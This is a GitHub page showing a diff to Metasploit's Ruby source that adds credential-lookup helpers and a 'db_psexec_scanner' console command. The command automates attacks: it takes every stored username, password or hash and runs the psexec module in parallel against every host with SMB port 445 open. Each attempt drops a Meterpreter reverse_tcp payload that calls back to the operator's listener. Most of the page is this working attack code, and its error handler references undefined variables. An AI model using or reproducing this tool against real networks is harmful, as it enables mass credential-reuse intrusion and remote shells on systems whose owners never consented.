metasploit_scripts/ps_exec_scanner.diff at master · hal3002/metasploit_scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
Index: lib/msf/core/db.rb
===================================================================
--- lib/msf/core/db.rb	(revision 12072)
+++ lib/msf/core/db.rb	(working copy)
@@ -514,6 +514,52 @@
 	end

 	#
+	# Find a specific credential by id
+	#
+	def find_cred_by_id(wspace=workspace, id)
+		Cred.find_by_id(id,
+			:include => {:service => :host},
+			:conditions => ["hosts.workspace_id = ?", wspace.id]
+		)
+	end
+
+	#
+	# Find credentials for a specific user
+	#
+	def find_unique_creds_by_user(wspace=workspace, user)
+		Cred.find(
+			:all,
+			:include => {:service => :host},
+			:conditions => ["hosts.workspace_id = ? AND user = ?", wspace.id, user],
+			:order => 'creds.id asc',
+			:group => 'pass'
+		)
+	end
+
+	#
+	# Find all unique creds
+	#
+	def unique_creds(wspace=workspace)
+		Cred.find(
+			:all,
+			:include => {:service => :host},
+			:conditions => ["hosts.workspace_id = ?", wspace.id],
+			:group => 'user, pass'
+		)
+	end
+
+	#
+	# Get a unique list of users
+	#
+	def users(wspace=workspace)
+		Cred.find(
+			:all,
+			:select => "distinct user",
+			:order => 'creds.user asc'
+		).map {|u| u[:user]}
+	end
+
+	#
 	# This method returns a list of all exploited hosts in the database.
 	#
 	def exploited_hosts(wspace=workspace)
Index: lib/msf/ui/console/command_dispatcher/db.rb
===================================================================
--- lib/msf/ui/console/command_dispatcher/db.rb	(revision 12072)
+++ lib/msf/ui/console/command_dispatcher/db.rb	(working copy)
@@ -75,6 +75,7 @@
 				"db_import_qualys_xml"  => "Import a Qualys scan results file (XML)",
 				"db_import_msfe_xml"    => "Import a Metasploit Express report (XML)",
 				"db_nmap"               => "Executes nmap and records the output automatically",
+				"db_psexec_scanner" => "Uses stored password hashes and service information with psexec",
 			}

 			base.merge(more)
@@ -2093,9 +2094,107 @@
 			res
 		end

+		def dump_creds
+			framework.db.users(framework.db.workspace).each do |user|
+				puts "#{user}:"
+
+				framework.db.find_unique_creds_by_user(framework.db.workspace, user).each do |cred|
+					puts "\t#{cred[:id]}: #{cred[:pass]}"
+				end
+			end
+		end
+
+		def build_creds(filter)
+			creds = []
+
+			if filter
+				filter.split(/,/).each do |id|
+					cred = framework.db.find_cred_by_id(id)
+					creds.push(cred) if cred
+				end
+			else
+				creds = framework.db.unique_creds(framework.db.workspace)
+			end
+
+			return creds
+		end
+
+		def psexec_scanner_usage
+			print_status("db_psexec_scanner -s <lhost> [-l] [-h] [-m <max_tries>] [-H <creds_list>]")
+			print_line("\t-s address - LHOST (can also be set with LHOST)")
+			print_line("\t[-H creds_list] - List credentials to use: ie. 3,4,5,9")
+			print_line("\t[-p port] - LPORT (can also be set with LPORT)")
+			print_line("\t[-t threads] - (default: 10) number of concurrent jobs to run)")
+			print_line("\t[-h] - You are looking at it")
+			print_line("\t[-l] - List credentials currently in the database")
+		end
+
+		def cmd_db_psexec_scanner(*args)
+
+			# Defaults
+			psexec = framework.modules.create('windows/smb/psexec')
+			psexec.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" if psexec.datastore['PAYLOAD'].nil?
+			psexec.datastore['THREADS'] = 10 if psexec.datastore['THREADS'].nil?
+			psexec.datastore['ExitOnSession'] = false
+
+			while(arg = args.shift)
+				case arg
+					when '-h'
+						return psexec_scanner_usage
+					when '-s'
+						psexec.datastore['LHOST'] = args.shift
+					when '-p'
+						psexec.datastore['LPORT'] = args.shift
+					when '-l'
+						return dump_creds
+					when '-t'
+						psexec.datastore['THREADS'] = args.shift.to_i
+					when '-H'
+						psexec.datastore['CRED_LIST'] = args.shift
+
+				end
+			end
+
+			# Make sure we have all of our requirements
+			return psexec_scanner_usage if psexec.datastore['LHOST'].nil?
+
+			# Time for the fun
+			build_creds(psexec.datastore['CRED_LIST']).each do |cred|
+
+				Msf::DBManager::Service.find_all_by_port_and_proto_and_state(445, 'tcp', 'open').each do |service|
+					print_status "Trying #{service.host.address} with #{cred[:user]}:#{cred[:pass]} (#{psexec.datastore['PAYLOAD']})"
+
+					mod = framework.modules.create(psexec.fullname)
+					psexec.datastore.keys.map {|k| mod.datastore[k] = psexec.datastore[k].to_s.dup }
+
+					mod.datastore['RHOST'] = service.host.address
+					mod.datastore['SMBUser'] = cred[:user]
+					mod.datastore['SMBPass'] = cred[:pass]
+					mod.datastore['LPORT'] = Random.new.rand(1025..65535) if psexec.datastore['LPORT'].nil?
+
+					# Borrowed from db_autopwn
+					while(framework.jobs.keys.length >= psexec.datastore['THREADS'])
+						::IO.select(nil, nil, nil, 0.25)
+					end
+
+					Thread.new(mod) do |m|
+						begin
+							m.exploit_simple(
+								'Payload'        => m.datastore['PAYLOAD'],
+								'LocalInput'     => (m.datastore['DEBUG'] ? driver.input : nil),
+								'LocalOutput'    => (m.datastore['DEBUG'] ? driver.output : nil),
+								'RunAsJob'       => true
+							)
+
+						rescue Exception => e
+							print_status("Error while trying #{user}:#{password} against #{service.host.address}: #{$!} ")
+						end
+					end
+				end
+			end
+		end
 end
 end
 end
 end
 end
-